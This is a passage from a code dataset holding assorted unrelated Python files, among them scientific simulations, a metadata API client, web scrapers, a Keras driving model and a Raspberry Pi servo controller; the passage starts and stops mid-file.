\")\n for k in range(0, len(ids)):\n if clust_size[ids[k]] >= minSize:\n liqPos.append(pos[k])\n elif clust_size[ids[k]] <= 100:\n gasPos.append(pos[k])\n \n # Cluster these data and refine\n subSys = freud.AABBQuery(f_box, f_box.wrap(liqPos))\n nlist = subSys.query(liqPos,\n dict(num_neighbors=6,\n exclude_ii=True,\n r_max=1.0,\n r_min=0.2)).toNeighborList()\n neigh = nlist.neighbor_counts\n \n # Loop through nlist to get my reduced 'bulk' particles\n bulkPos = []\n print(\"Getting positions of bulk liquid... \")\n for k in range(0, len(neigh)):\n if neigh[k] >= 6:\n bulkPos.append(liqPos[k])\n \n # Let's plot this positional data to see what particles we're taking\n allx = pos[:, 0]\n ally = pos[:, 1]\n bulkx = list(list(zip(*bulkPos))[0])\n bulky = list(list(zip(*bulkPos))[1])\n gasx = list(list(zip(*gasPos))[0])\n gasy = list(list(zip(*gasPos))[1])\n plt.scatter(allx, ally, c='k', s=0.5, edgecolor='none')\n plt.scatter(bulkx, bulky, c='r', s=0.5, edgecolor='none')\n plt.scatter(gasx, gasy, c='b', s=0.5, edgecolor='none')\n ax = plt.gca()\n ax.axis('equal')\n plt.show()\n \n \n \n# # Get the positions of all particles in LC\n# binParts = [[[] for b in range(NBins)] for a in range(NBins)]\n# liqPos = []\n# for k in range(0, len(ids)):\n# if ids[k] in liqIDs:\n# liqPos.append(pos[k])\n# # Convert position to be > 0 to place in list mesh\n# tmp_posX = pos[k][0] + h_box\n# tmp_posY = pos[k][1] + h_box\n# x_ind = int(tmp_posX / sizeBin)\n# y_ind = int(tmp_posY / sizeBin)\n# # Append particle id to appropriate bin\n# binParts[x_ind][y_ind].append(k)\n#\n# elif ids[k] in gasIDs:\n#\n#\n# # If sufficient neighbor bins are empty, we have an edge\n# thresh = 1.5\n# # Loop through x index of mesh\n# for ix in range(0, len(occParts)):\n#\n# # If at right edge, wrap to left\n# if (ix + 1) != NBins:\n# lookx = [ix-1, ix, ix+1]\n# else:\n# lookx = [ix-1, ix, 0]\n#\n# # Loop through y index of mesh\n# for iy in range(0, len(occParts[ix])):\n#\n# # Reset neighbor counter\n# count = 0\n# # If the bin is not occupied, skip it\n# if occParts[ix][iy] == 0:\n# continue\n# # If at top edge, wrap to bottom\n# if (iy + 1) != NBins:\n# looky = [iy-1, iy, iy+1]\n# else:\n# looky = [iy-1, iy, 0]\n#\n# # Loop through surrounding x-index\n# for indx in lookx:\n# # Loop through surrounding y-index\n# for indy in looky:\n#\n# # If neighbor bin is NOT occupied\n# if occParts[indx][indy] == 0:\n# # If neighbor bin shares a vertex\n# if indx != ix and indy != iy:\n# count += 0.5\n# # If neighbor bin shares a side\n# else:\n# count += 1\n#\n# # If sufficient neighbors are empty, we found an edge\n# if count >= thresh:\n# edgeBin[indx][indy] = 1\n#\n# # Sum the resultant edge mesh\n# Nedges = 0\n# for ix in range(0, len(occParts)):\n# for iy in range(0, len(occParts[ix])):\n# Nedges += edgeBin[ix][iy]\n#\n# # The edge length of sufficiently large clusters\n# lEdge = Nedges * sizeBin\n#\n# # Write this to a textfile with the timestep\n# g = open(outFile, 'a')\n# g.write('{0:.3f}'.format(tst).center(10) + ' ')\n# g.write('{0:.1f}'.format(lEdge).center(10) + '\\n')\n# g.close()\n#\n## # A sanity check on a perfect hcp circle\n## print(Nedges)\n## print(Nedges * sizeBin)\n## x = list(list(zip(*lcPos))[0])\n## y = list(list(zip(*lcPos))[1])\n## diam = max(x) - min(x)\n## circ = diam * np.pi\n## print(circ)\n## print(Nedges * sizeBin / circ)\n##\n## # Let's plot imshow to make sure we're good thus far\n## fig, ax = plt.subplots()\n## ax.imshow(edgeBin, extent=[0, l_box, 0, l_box], aspect='auto', origin='lower')\n## 
ax.set_aspect('equal')\n## plt.show()\n#\n#\n","sub_path":"post_proc/interparticle_pressure_neighbor.py","file_name":"interparticle_pressure_neighbor.py","file_ext":"py","file_size_in_byte":10383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174675987","text":"#\n# Copyright 2021 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n#\n\"\"\"\nAquarius module.\nHelp to communicate with the metadata store.\n\"\"\"\n\n# Copyright 2018 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n\nimport json\nimport logging\n\nfrom ocean_lib.common.ddo.ddo import DDO\nfrom ocean_lib.common.http_requests.requests_session import get_requests_session\n\nlogger = logging.getLogger(\"aquarius\")\n\n\nclass Aquarius:\n    \"\"\"Aquarius wrapper to call the different endpoints of the aquarius component.\"\"\"\n\n    def __init__(self, aquarius_url):\n        \"\"\"\n        The Metadata class is a wrapper on the Metadata Store, which has exposed a REST API.\n\n        :param aquarius_url: Url of the aquarius instance.\n        \"\"\"\n        assert aquarius_url, f'Invalid url \"{aquarius_url}\"'\n        # :HACK:\n        if \"/api/v1/aquarius/assets\" in aquarius_url:\n            aquarius_url = aquarius_url[: aquarius_url.find(\"/api/v1/aquarius/assets\")]\n\n        self._base_url = f\"{aquarius_url}/api/v1/aquarius/assets\"\n        self._headers = {\"content-type\": \"application/json\"}\n\n        logging.debug(f\"Metadata Store connected at {aquarius_url}\")\n        logging.debug(f\"Metadata Store API documentation at {aquarius_url}/api/v1/docs\")\n        logging.debug(f\"Metadata assets at {self._base_url}\")\n\n        self.requests_session = get_requests_session()\n\n    @property\n    def root_url(self):\n        return self._base_url[: self._base_url.find(\"/api/v1/\")]\n\n    @property\n    def url(self):\n        \"\"\"Base URL of the aquarius instance.\"\"\"\n        return f\"{self._base_url}/ddo\"\n\n    def get_service_endpoint(self):\n        \"\"\"\n        Retrieve the endpoint with the ddo for a given did.\n\n        :return: Return the url of the ddo location\n        \"\"\"\n        return f\"{self.url}/\" + \"{did}\"\n\n    def list_assets(self):\n        \"\"\"\n        List all the assets registered in the aquarius instance.\n\n        :return: List of DID string\n        \"\"\"\n        response = self.requests_session.get(self._base_url).content\n        asset_list = _parse_response(response, [])\n\n        return asset_list\n\n    def get_asset_ddo(self, did):\n        \"\"\"\n        Retrieve asset ddo for a given did.\n\n        :param did: Asset DID string\n        :return: DDO instance\n        \"\"\"\n        response = self.requests_session.get(f\"{self.url}/{did}\").content\n        parsed_response = _parse_response(response, None)\n\n        if not parsed_response:\n            return {}\n\n        return DDO(dictionary=parsed_response)\n\n    def get_asset_metadata(self, did):\n        \"\"\"\n        Retrieve asset metadata for a given did.\n\n        :param did: Asset DID string\n        :return: metadata key of the DDO instance\n        \"\"\"\n        response = self.requests_session.get(f\"{self._base_url}/metadata/{did}\").content\n        parsed_response = _parse_response(response, [])\n\n        return parsed_response\n\n    def list_assets_ddo(self):\n        \"\"\"\n        List all the ddos registered in the aquarius instance.\n\n        :return: List of DDO instance\n        \"\"\"\n        return json.loads(self.requests_session.get(self.url).content)\n\n    def text_search(self, text, sort=None, offset=100, page=1):\n        \"\"\"\n        Search in aquarius using text query.\n\n        Given the string aquarius will do a full-text query to search in all documents.\n\n        Currently implemented are the MongoDB and Elastic Search drivers.\n\n        For a detailed guide on how to search, see the MongoDB 
driver documentation:\n https://docs.mongodb.com/manual/reference/operator/query/text/\n\n And the Elastic Search documentation:\n https://www.elastic.co/guide/en/elasticsearch/guide/current/full-text-search.html\n Other drivers are possible according to each implementation.\n\n :param text: String to be searched.\n :param sort: 1/-1 to sort ascending or descending.\n :param offset: Integer with the number of elements displayed per page.\n :param page: Integer with the number of page.\n :return: List of DDO instance\n \"\"\"\n assert page >= 1, f\"Invalid page value {page}. Required page >= 1.\"\n payload = {\"text\": text, \"sort\": sort, \"offset\": offset, \"page\": page}\n response = self.requests_session.post(\n f\"{self.url}/query\", data=json.dumps(payload), headers=self._headers\n )\n if response.status_code == 200:\n return self._parse_search_response(response.content)\n else:\n raise ValueError(f\"Unable to search for DDO: {response.content}\")\n\n def query_search(self, search_query, sort=None, offset=100, page=1):\n \"\"\"\n Search using a query.\n\n Currently implemented is the MongoDB query model to search for documents according to:\n https://docs.mongodb.com/manual/tutorial/query-documents/\n\n And an Elastic Search driver, which implements a basic parser to convert the query into\n elastic search format.\n\n Example: query_search({\"price\":[0,10]})\n\n :param search_query: Python dictionary, query following mongodb syntax\n :param sort: 1/-1 to sort ascending or descending.\n :param offset: Integer with the number of elements displayed per page.\n :param page: Integer with the number of page.\n :return: List of DDO instance\n \"\"\"\n assert page >= 1, f\"Invalid page value {page}. Required page >= 1.\"\n search_query[\"sort\"] = sort\n search_query[\"offset\"] = offset\n search_query[\"page\"] = page\n response = self.requests_session.post(\n f\"{self.url}/query\", data=json.dumps(search_query), headers=self._headers\n )\n if response.status_code == 200:\n return self._parse_search_response(response.content)\n else:\n raise ValueError(f\"Unable to search for DDO: {response.content}\")\n\n def validate_metadata(self, metadata):\n \"\"\"\n Validate that the metadata of your ddo is valid.\n\n :param metadata: conforming to the Metadata accepted by Ocean Protocol, dict\n :return: bool\n \"\"\"\n response = self.requests_session.post(\n f\"{self.url}/validate\", data=json.dumps(metadata), headers=self._headers\n )\n if response.content == b\"true\\n\":\n return True, []\n else:\n parsed_response = self._parse_search_response(response.content)\n return False, parsed_response\n\n @staticmethod\n def _parse_search_response(response):\n parsed_response = _parse_response(response, None)\n\n if isinstance(parsed_response, dict) or isinstance(parsed_response, list):\n return parsed_response\n\n raise ValueError(\n f\"Unknown search response, expecting a list or dict, got {type(parsed_response)}.\"\n )\n\n\ndef _parse_response(response, default_return):\n if not response:\n return default_return\n\n try:\n return json.loads(response)\n except TypeError:\n return default_return\n except ValueError:\n raise ValueError(response.decode(\"UTF-8\"))
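\n\n# Example usage (illustrative; the URL and DID below are hypothetical):\n# aquarius = Aquarius(\"http://localhost:5000\")\n# ddo = aquarius.get_asset_ddo(\"did:op:...\")\n# hits = aquarius.text_search(\"weather data\", offset=10, page=1)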
\n","sub_path":"ocean_lib/common/aquarius/aquarius.py","file_name":"aquarius.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641278091","text":"from celery import Celery\nimport urllib.request\nimport os\n\n# Where the downloaded files will be stored\nBASEDIR=\"/workspace/app-downloader/downloads\"\n\n# Create the app and set the broker location (RabbitMQ)\napp = Celery('app-downloader',\n backend='rpc://',\n broker='pyamqp://guest@localhost//')\n\n@app.task\ndef download(url, filename):\n \"\"\"\n Download a page and save it to the BASEDIR directory\n url: the url to download\n filename: the filename used to save the url in BASEDIR\n \"\"\"\n response = urllib.request.urlopen(url)\n data = response.read()\n with open(BASEDIR+\"/\"+filename,'wb') as file:\n file.write(data)\n file.close()\n\n@app.task\ndef list():\n \"\"\" Return an array of all downloaded files \"\"\"\n return os.listdir(BASEDIR)\n\n ","sub_path":"app/workspace/app-downloader/app-downloader.py","file_name":"app-downloader.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592828845","text":"# -*- coding: utf-8 -*-\nfrom time import sleep\n\nfrom selenium_file.Base import Base\n\n\nclass TestFile(Base):\n def test_file_upload(self):\n self.driver.get(\"http://www.baidu.com\")\n self.driver.find_element_by_xpath(\"//*[@id='form']/span[1]/span[1]\").click()\n # a file can be uploaded via send_keys: target the upload input and pass the image path\n self.driver.find_element_by_xpath(\"//*[@id='form']/div/div[2]/div[2]/input\").send_keys(\n \"C:/Users/Administrator/Pictures/压缩版panda.png\")\n sleep(3)","sub_path":"selenium_file/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"18421892","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Date : 17/2/16 PM3:58\n# Copyright: TradeShift.com\n__author__ = 'liming'\n\nfrom flask.ext.restful import reqparse\n\ndef get_parser(arguments):\n parser = reqparse.RequestParser()\n for arg in arguments:\n parser.add_argument(arg)\n return parser","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"146302562","text":"import json\nimport logging\nimport os\nimport shutil\nimport torch\n\n\nclass Params():\n \"\"\"Class that loads hyperparameters from a json file\"\"\"\n\n def __init__(self, json_path):\n with open(json_path) as f:\n params = json.load(f)\n self.__dict__.update(params)\n\n def save(self, json_path):\n with open(json_path, 'w') as f:\n json.dump(self.__dict__, f, indent=4)\n\n def update(self, json_path):\n \"\"\"Loads parameters from json file\"\"\"\n with open(json_path) as f:\n params = json.load(f)\n self.__dict__.update(params)\n\n @property\n def dict(self):\n \"\"\"Gives dict-like access to Params instance by params.dict['learning_rate']\"\"\"\n return self.__dict__\n\n\nclass RunningAverage():\n \"\"\"A simple class that maintains the running average of a quantity\n Example:\n ```\n loss_avg = RunningAverage()\n loss_avg.update(2)\n loss_avg.update(4)\n loss_avg() = 3\n ```\n \"\"\"\n\n def __init__(self):\n self.steps = 0\n self.total = 0\n\n def update(self, val):\n self.total += val\n self.steps += 1\n\n def __call__(self):\n return self.total / float(self.steps)\n\n\ndef set_logger(log_path):\n \"\"\"Set the logger to log info in terminal and file 'log_path' \"\"\"\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n if not logger.handlers:\n # Logging to a file\n file_handler = 
logging.FileHandler(log_path)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s:%(levelname)s:%(message)s'))\n logger.addHandler(file_handler)\n\n # Logging to console\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(stream_handler)\n","sub_path":"Sequence-Models/Name-Entity-Recognition/.ipynb_checkpoints/utils-checkpoint.py","file_name":"utils-checkpoint.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"85609035","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport time\r\nimport csv\r\n\r\nSTART_URL = \"https://en.m.wikipedia.org/wiki/List_of_brightest_stars_and_other_record_stars\"\r\n\r\nbrowser = webdriver.Chrome(r\"C:\\Users\\Subramaniam\\Dropbox\\My PC (LAPTOP-499770CL)\\Downloads\\Pro-127\\chromedriver.exe\")\r\nbrowser.get(START_URL)\r\ntime.sleep(10)\r\nShining_stars = []\r\nheaders = [\"V_Mag.\", \"proper_name\", \"bayer_designation\", \"distance\", \"spectral_class\", \"mass\", \"radius\", \"luminosity\"]\r\n\r\ndef Scrape(): \r\n for i in range(0, 439):\r\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\r\n for ul_tag in soup.find_all(\"ul\", attrs = {\"class\": \"List_of_brightest_stars_and_other_record_stars\"}):\r\n li_tags = ul_tag.find_all(\"li\")\r\n temp_list = []\r\n for index, li_tag in enumerate(li_tags):\r\n if index == 0:\r\n temp_list.append(li_tag.find_all(\"a\")[0].contents[0])\r\n else:\r\n try:\r\n temp_list.append(li_tag.contents[0])\r\n except:\r\n temp_list.append(\"\")\r\n Shining_stars.append(temp_list)\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[2]/a').click()\r\n with open(\"scrapper_2.csv\", \"w\", newline=\"\") as f: \r\n csvwriter = csv.writer(f)\r\n csvwriter.writerow(headers)\r\n csvwriter.writerows(Shining_stars)\r\n\r\nScrape() ","sub_path":"Pro-127/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"403045675","text":"'''\r\nSymplectic Euler time integration of 2 particles\r\ninteracting under a morse potential in 3D euclidean space.\r\n\r\nProduces plots of the relative separations of the particles\r\nand the total energy, both as functions of time.\r\nAlso saves these to file.\r\n'''\r\n\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as pyplot\r\nfrom Particle3D import Particle3D\r\n\r\ndef force_dw(p1, p2, a, D, r):\r\n \"\"\"\r\n Method to return the morse force between 2 particles.\r\n Force on particle1 is given by\r\n F(p1, p2) = -2aD(1-exp[-a(mod(p1-p2)-r)])exp[-a(mod(p1-p2)-r)](p1-p2)\r\n\r\n :param p1: position of particle 1 in 3D euclidean space given by Numpy array\r\n :param p2: position of particle 2 in 3D euclidean space given by Numpy array\r\n :param a: parameter a system specific, read in from file\r\n :param D: parameter D system specific, read in from file\r\n :param r: parameter r system specific, read in from file\r\n :return: force acting on particle as Numpy array\r\n \"\"\"\r\n exponent = math.exp(-a*(np.linalg.norm(p1.position-p2.position)- r))\r\n force = -2*a*D*(1-exponent)*exponent*((p1.position-p2.position)/np.linalg.norm(p1.position-p2.position))\r\n return force\r\n\r\ndef pot_energy_dw(p1, p2, a, D, r):\r\n \"\"\"\r\n Method to return the morse potential energy\r\n of 2 particles at p1 and p2\r\n 
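(the potential has its minimum value -D at mod(p1-p2) = r and tends to 0 at infinite separation)\r\n 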
V(p1, p2) = D*((1-exp[-a(mod(p1-p2)-r)])^2 -1)\r\n\r\n :param p1: position of particle 1 in 3D euclidean space given by Numpy array\r\n :param p2: position of particle 2 in 3D euclidean space given by Numpy array\r\n :param a: parameter a system specific, read in from file\r\n :param D: parameter D system specific, read in from file\r\n :param r: parameter r system specific, read in from file\r\n :return: potential energy of pair as float\r\n \"\"\"\r\n exponent = math.exp(-a*(np.linalg.norm(p1.position-p2.position)- r))\r\n potential = D*((1 -exponent)**2 -1)\r\n return potential\r\n\r\n# Begin main code\r\ndef main():\r\n\r\n # Read name of output file from command line\r\n if len(sys.argv)!=2:\r\n print(\"Wrong number of arguments.\")\r\n print(\"Usage: \" + sys.argv[0] + \" \")\r\n quit()\r\n else:\r\n outfile_name = sys.argv[1]\r\n\r\n # Open output file\r\n outfile = open(outfile_name, \"w\")\r\n\r\n #read in initial conditions from appropriate files\r\n file_handle = open(\"N2_input.txt\",\"r\")\r\n p1 = Particle3D.from_file(file_handle)\r\n p2 = Particle3D.from_file(file_handle)\r\n settings = open(\"N2_potential_settings.txt\", \"r\")\r\n a = float(settings.readline())\r\n D = float(settings.readline())\r\n r = float(settings.readline())\r\n\r\n #Set up simulation parameters\r\n dt = 0.014\r\n numstep = 110\r\n time = 0.0\r\n\r\n #Calculate seperation vector and absolute value of it\r\n seperation = np.linalg.norm(p1.position - p2.position)\r\n vector_sep = Particle3D.vector_seperation(p1, p2)\r\n\r\n # Write out initial conditions\r\n energy = p1.kinetic_energy() + p2.kinetic_energy() + pot_energy_dw(p1, p2, a, D, r)\r\n outfile.write(\"{0:f} {1:f} {2:f} {3:f} {4:12.8f}\\n\".format(time, vector_sep[0], vector_sep[1], vector_sep[2], energy))\r\n\r\n\r\n # Initialise data lists for plotting later\r\n time_list = [time]\r\n pos_list = [seperation]\r\n energy_list = [energy]\r\n\r\n # Start the time integration loop\r\n\r\n for i in range(numstep):\r\n # Update particle position and seperation\r\n p1.leap_pos1st(dt)\r\n p2.leap_pos1st(dt)\r\n seperation = np.linalg.norm(p1.position - p2.position)\r\n vector_sep = Particle3D.vector_seperation(p1, p2)\r\n\r\n # Calculate force\r\n force1 = force_dw(p1, p2, a, D, r)\r\n force2 = -force1\r\n\r\n # Update particle velocity\r\n p1.leap_velocity(dt, force1)\r\n p2.leap_velocity(dt, force2)\r\n\r\n # Increase time\r\n time = time + dt\r\n\r\n # Output particle information\r\n energy = p1.kinetic_energy() +p2.kinetic_energy() + pot_energy_dw(p1, p2, a, D, r)\r\n outfile.write(\"{0:f} {1:f} {2:f} {3:f} {4:12.8f}\\n\".format(time, vector_sep[0], vector_sep[1], vector_sep[2], energy))\r\n\r\n # Append information to data lists\r\n time_list.append(time)\r\n pos_list.append(seperation)\r\n energy_list.append(energy)\r\n\r\n # Post-simulation:\r\n # Close output file\r\n outfile.close()\r\n\r\n # Plot particle trajectory to screen\r\n pyplot.title('Symplectic Euler: Seperation vs time')\r\n pyplot.xlabel('Time, 10.18fs')\r\n pyplot.ylabel('Seperation, Angstroms')\r\n pyplot.plot(time_list, pos_list)\r\n pyplot.show()\r\n\r\n # Plot particle energy to screen\r\n pyplot.title('Symplectic Euler: Total Energy vs Time')\r\n pyplot.xlabel('Time, 10.18fs')\r\n pyplot.ylabel('Energy, eV')\r\n pyplot.plot(time_list, energy_list)\r\n pyplot.show()\r\n\r\n\r\n# Execute main 
method:\r\nmain()\r\n","sub_path":"symplecticEuler3D.py","file_name":"symplecticEuler3D.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"373810580","text":"#/usr/bin/python\n#coding:UTF-8\nimport RPi.GPIO as GPIO\nimport time\n\nclass _Getch:\n \"\"\"Gets a single character from standard input. Does not echo to the\nscreen.\"\"\"\n def __init__(self):\n try:\n self.impl = _GetchWindows()\n except ImportError:\n self.impl = _GetchUnix()\n\n def __call__(self): return self.impl()\n\n\nclass _GetchUnix:\n def __init__(self):\n import tty, sys\n\n def __call__(self):\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\nclass _GetchWindows:\n def __init__(self):\n import msvcrt\n\n def __call__(self):\n import msvcrt\n return msvcrt.getch()\n\n# getch = _Getch()\n# x = getch()\n#\n# if (int(x) == 1):\n# print \"\\n\"\n# print 'correct'\n# print x\n# else:\n# print \"\\n\"\n# print 'wrong'\n# print x\n\n\n\n#\t\t\ttime.sleep(1)\n\n\n\n\nPIN=24\nQIN=23\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(PIN,GPIO.OUT)\nGPIO.setup(QIN,GPIO.OUT)\np=GPIO.PWM(PIN,50)\nq=GPIO.PWM(QIN,50)\np.start(5)\nq.start(5)\ntime.sleep(1)\nrow = 5\ncol = 5\nval = 0.1\n\ndef direction(key):\n\tglobal row\n\tglobal col\n\tif x == \"w\" and row > 2:\n\t\trow -= val\n\telif x == \"s\" and row < 9:\n\t\trow += val\n\telif x == \"n\":\n\t\trow = 5\n\t\tcol = 5\n\telif x == \"a\" and col < 9:\n\t\tcol += val\n\telif x == \"d\" and col > 2:\n\t\tcol -= val\n\telif x == \"z\":\n\t\tprint(\"DONE.\")\n\t\texit()\n\tp.start(row)\n\tq.start(col)\n\n\ntry:\n\n\n\twhile True:\n\t\tgetch = _Getch()\n\t\tx = getch()\n\t\tdirection(x)\n\nexcept KeyboardInterrupt:\n\tp = GPIO.PWM(PIN,50)\n\tq = GPIO.PWM(QIN,50)\n\tp.start(5)\n\tq.start(5)\n\ttime.sleep(1)\n\tGPIO.cleanup()\n","sub_path":"raw_input2.py","file_name":"raw_input2.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"360409353","text":"# -*- encoding:utf-8 -*-\n\n\nimport csv\nimport cv2\nimport numpy as np\nimport random\n\n\ndef main():\n lines = []\n with open(\"driving_log.csv\") as dl_csv:\n reader = csv.reader(dl_csv)\n for line in reader:\n lines.append(line)\n\n #loading data and preprocessing\n images = []\n measurements = []\n correction = 0.2\n random.shuffle(lines)\n for line in lines:\n if random.random() > 1:\n continue\n source_path = line[0]\n filename = source_path.split(\"/\")[-1]\n current_path = \"IMG/\" + filename\n image = cv2.imread(current_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n images.append(image)\n measurement = float(line[3])\n measurements.append(measurement)\n\n image_left = cv2.imread(\"IMG/\" + line[1].split(\"/\")[-1])\n image_left = cv2.cvtColor(image_left, cv2.COLOR_BGR2GRAY)\n measurement_left = float(line[3]) + correction\n images.append(image_left)\n measurements.append(measurement_left)\n\n image_right = cv2.imread(\"IMG/\" + line[2].split(\"/\")[-1])\n image_right = cv2.cvtColor(image_right, cv2.COLOR_BGR2GRAY)\n measurement_right = float(line[3]) - correction\n images.append(image_right)\n measurements.append(measurement_right)\n\n augmented_images, augmented_measurements = [], []\n for image, measurement in zip(images, measurements):\n 
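# keep each original frame, then add a horizontally flipped copy with the steering angle negated\n 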
augmented_images.append(image)\n augmented_measurements.append(measurement)\n augmented_images.append(cv2.flip(image, 1))\n augmented_measurements.append(measurement * -1.0)\n\n X_train = np.array(augmented_images)\n X_train = np.resize(X_train, (len(augmented_images), 160, 320, 1))\n y_train = np.array(augmented_measurements)\n\n from keras.models import Sequential\n from keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout, Activation\n from keras.layers.convolutional import Convolution2D\n from keras.layers.pooling import MaxPooling2D, AveragePooling2D\n from keras.layers.normalization import BatchNormalization\n from keras.optimizers import Adam\n\n #model structure\n model = Sequential()\n model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160, 320, 1)))\n model.add(Cropping2D(cropping=((65, 25), (0, 0))))\n\n model.add(Convolution2D(18, 5, 5, subsample=(4, 4)))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Convolution2D(24, 5, 5, subsample=(2, 2)))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Convolution2D(48, 3, 3, subsample=(2, 1)))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Convolution2D(64, 3, 3))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(128))\n model.add(Dense(32))\n model.add(Dense(16))\n model.add(Dense(1))\n\n #training process\n adam = Adam(lr=0.0008)\n model.compile(loss=\"mse\", optimizer=adam)\n history = model.fit(\n X_train, y_train, batch_size=32, validation_split=0.05,\n shuffle=True, nb_epoch=20)\n\n #save the model\n model.save(\"model.h5\")\n import pickle\n pickle.dump(history.history, open(\"history.pickle\", \"wb\"))\n\n model.summary()\n model.get_config()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"92905231","text":"import re\n\nf = open('britain-text.txt','r')\ntext = f.read()\nf.close()\ntmp_dic = {}\n\nr = re.compile(r'\\{\\{基礎情報(.+)\\n\\}\\}\\n', re.MULTILINE | re.S)\ntmp_list = r.search(text).group(1).split('\\n|')\n\nr = re.compile(r'(.+)=(.+)', re.MULTILINE | re.S)\n\n# regular expressions for post-processing\ninternal_link = re.compile(r'\\[{1,2}(.+)\\]{1,2}')\nfor tmp in tmp_list:\n m = r.match(tmp)\n if m:\n # process m.group(2)\n field = re.sub(r'\\'{2,5}','',m.group(2))\n tmp_dic[m.group(1).replace(' ','')] = field\n\nfor i, v in tmp_dic.items():\n print(i+':'+v)\n","sub_path":"chapter3/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"108710666","text":"# For loops with a list:\r\n# fruits = [\"Apple\", \"Banana\", \"Mango\", \"Papaya\"]\r\n# for fruit in fruits:\r\n# print(fruit)\r\n# print(f\"{fruit} Pie\")\r\n\r\n# For loops with range: default increase is one\r\n# for number in range(1, 10):\r\n# print(number)\r\n\r\n\r\n# For loops with range: the step is the number provided as the third argument\r\n# for number in range(1, 10, 2):\r\n# print(number)\r\n\r\n# adding numbers using for loop:\r\n# total_sum = 0\r\n# for number in range(1, 101):\r\n# total_sum += number\r\n# print(f\"Sum is : {total_sum}\")\r\n\r\n# Sum of all the even numbers from 1 - 100:\r\neven_sum 
= 0\r\nfor num in range(1, 101):\r\n if num % 2 == 0:\r\n even_sum += num\r\nprint(f\"Sum of all even numbers is : {even_sum}\")\r\n","sub_path":"fruitLoop/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"493182865","text":"\"\"\"Server-side message object\n\"\"\"\n\nimport sys\nimport selectors\nimport json\nimport io\nimport struct\nimport logging\n\nfrom datas_src.apis import API\n\nlogger = logging.getLogger(\"libserver\")\n\n\nrequest_search = {\n \"morpheus\": \"Follow the white rabbit. \\U0001f430\",\n \"ring\": \"In the caves beneath the Misty Mountains. \\U0001f48d\",\n \"\\U0001f436\": \"\\U0001f43e Playing ball! \\U0001f3d0\",\n}\n\n\nclass Message:\n def __init__(self, selector, sock, addr):\n self.selector = selector # polling manager object\n self.sock = sock\n self.addr = addr\n self._recv_buffer = b\"\" # receive buffer\n self._send_buffer = b\"\" # send buffer\n self._jsonheader_len = None # stores the header length\n self.jsonheader = None # stores the request header\n self.request = None # stores the request body\n self.response_created = False # whether the response message has been created\n\n def _set_selector_events_mask(self, mode):\n \"\"\"Set selector to listen for events: mode is 'r', 'w', or 'rw'.\n \"\"\"\n if mode == \"r\":\n events = selectors.EVENT_READ\n elif mode == \"w\":\n events = selectors.EVENT_WRITE\n elif mode == \"rw\":\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n else:\n raise ValueError(f\"Invalid events mask mode {repr(mode)}.\")\n self.selector.modify(self.sock, events, data=self)\n\n def _read(self):\n \"\"\"Read via the socket's recv.\n Reads in chunks until everything has been read.\n \"\"\"\n try:\n # Should be ready to read\n data = self.sock.recv(4096)\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n if data:\n self._recv_buffer += data\n else:\n raise 